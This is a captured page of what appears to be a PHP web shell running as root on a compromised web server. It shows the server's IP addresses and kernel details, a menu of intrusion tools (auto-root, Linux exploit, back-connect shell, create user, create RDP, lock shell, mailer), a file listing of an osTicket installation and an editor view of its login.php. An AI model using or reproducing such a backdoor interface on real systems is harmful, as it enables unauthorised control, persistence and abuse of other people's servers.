Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
scp /
[ HOME SHELL ]
Name
Size
Permission
Action
apps
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
admin.inc.php
2.77
KB
-rw-r--r--
admin.php
70
B
-rw-r--r--
ajax.php
15.5
KB
-rw-r--r--
apikeys.php
5.44
KB
-rw-r--r--
audits.php
939
B
-rw-r--r--
autocron.php
2.32
KB
-rw-r--r--
banlist.php
7.15
KB
-rw-r--r--
canned.php
8.51
KB
-rw-r--r--
categories.php
7.2
KB
-rw-r--r--
dashboard.php
1.75
KB
-rw-r--r--
departments.php
13.45
KB
-rw-r--r--
directory.php
797
B
-rw-r--r--
emails.php
3.77
KB
-rw-r--r--
emailsettings.php
1.32
KB
-rw-r--r--
emailtest.php
5.49
KB
-rw-r--r--
export.php
757
B
-rw-r--r--
faq.php
6.7
KB
-rw-r--r--
filters.php
6.83
KB
-rw-r--r--
forms.php
6.82
KB
-rw-r--r--
helptopics.php
11.05
KB
-rw-r--r--
index.php
548
B
-rw-r--r--
kb.php
1.05
KB
-rw-r--r--
lists.php
8.39
KB
-rw-r--r--
login.php
3.7
KB
-rw-r--r--
logo.php
1.32
KB
-rw-r--r--
logout.php
1.12
KB
-rw-r--r--
logs.php
2.25
KB
-rw-r--r--
orgs.php
4.86
KB
-rw-r--r--
pages.php
6.75
KB
-rw-r--r--
plugins.php
2.05
KB
-rw-r--r--
profile.php
2.06
KB
-rw-r--r--
pwreset.php
2.99
KB
-rw-r--r--
queues.php
3.65
KB
-rw-r--r--
roles.php
5.84
KB
-rw-r--r--
schedules.php
2.49
KB
-rw-r--r--
settings.php
2
KB
-rw-r--r--
slas.php
6.07
KB
-rw-r--r--
staff.inc.php
4.83
KB
-rw-r--r--
staff.php
8.79
KB
-rw-r--r--
system.php
772
B
-rw-r--r--
tasks.php
9.96
KB
-rw-r--r--
teams.php
5.93
KB
-rw-r--r--
templates.php
9.04
KB
-rw-r--r--
tickets.php
23.35
KB
-rw-r--r--
upgrade.php
3.32
KB
-rw-r--r--
users.php
9.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.php
<?php /********************************************************************* login.php Handles staff authentication/logins Peter Rotich <peter@osticket.com> Copyright (c) 2006-2013 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ require_once('../main.inc.php'); if(!defined('INCLUDE_DIR')) die('Fatal Error. Kwaheri!'); // Bootstrap gettext translations. Since no one is yet logged in, use the // system or browser default TextDomain::configureForUser(); require_once(INCLUDE_DIR.'class.staff.php'); require_once(INCLUDE_DIR.'class.csrf.php'); $content = Page::lookupByType('banner-staff'); $dest = $_SESSION['_staff']['auth']['dest']; $msg = $_SESSION['_staff']['auth']['msg']; $msg = $msg ?: ($content ? $content->getLocalName() : __('Authentication Required')); $dest=($dest && (!strstr($dest,'login.php') && !strstr($dest,'ajax.php')))?$dest:'index.php'; $show_reset = false; if ($_POST) { $json = isset($_POST['ajax']) && $_POST['ajax']; $respond = function($code, $message) use ($json, $ost) { if ($json) { $payload = is_array($message) ? $message : array('message' => $message); $payload['status'] = (int) $code; Http::response(200, JSONDataEncoder::encode($payload), 'application/json'); } else { // Extract the `message` portion only if (is_array($message)) $message = $message['message']; Http::response($code, $message); } }; $redirect = function($url) use ($json) { if ($json) Http::response(200, JsonDataEncoder::encode(array( 'status' => 302, 'redirect' => $url)), 'application/json'); else Http::redirect($url); }; // Check the CSRF token, and ensure that future requests will have to // use a different CSRF token. This will help ward off both parallel and // serial brute force attacks, because new tokens will have to be // requested for each attempt. if (!$ost->checkCSRFToken()) { $_SESSION['_staff']['auth']['msg'] = __('Valid CSRF Token Required'); $redirect($_SERVER['REQUEST_URI']); } } if ($_POST && isset($_POST['userid'])) { // Lookup support backends for this staff $username = trim($_POST['userid']); if ($user = StaffAuthenticationBackend::process($username, $_POST['passwd'], $errors)) { $redirect($dest); } $msg = $errors['err'] ?: __('Invalid login'); $show_reset = true; if ($json) { $respond(401, ['message' => $msg, 'show_reset' => $show_reset]); } else { // Rotate the CSRF token (original cannot be reused) $ost->getCSRF()->rotate(); } } elseif ($_GET['do']) { switch ($_GET['do']) { case 'ext': // Lookup external backend if ($bk = StaffAuthenticationBackend::getBackend($_GET['bk'])) $bk->triggerAuth(); } Http::redirect('login.php'); } // Consider single sign-on authentication backends elseif (!$thisstaff || !($thisstaff->getId() || $thisstaff->isValid())) { if (($user = StaffAuthenticationBackend::processSignOn($errors, false)) && ($user instanceof StaffSession)) { Http::redirect($dest); } else if (isset($_SESSION['_staff']['auth']['msg'])) { $msg = $_SESSION['_staff']['auth']['msg']; } } // Browsers shouldn't suggest saving that username/password Http::response(422); define("OSTSCPINC",TRUE); //Make includes happy! include_once(INCLUDE_DIR.'staff/login.tpl.php'); ?>
Close
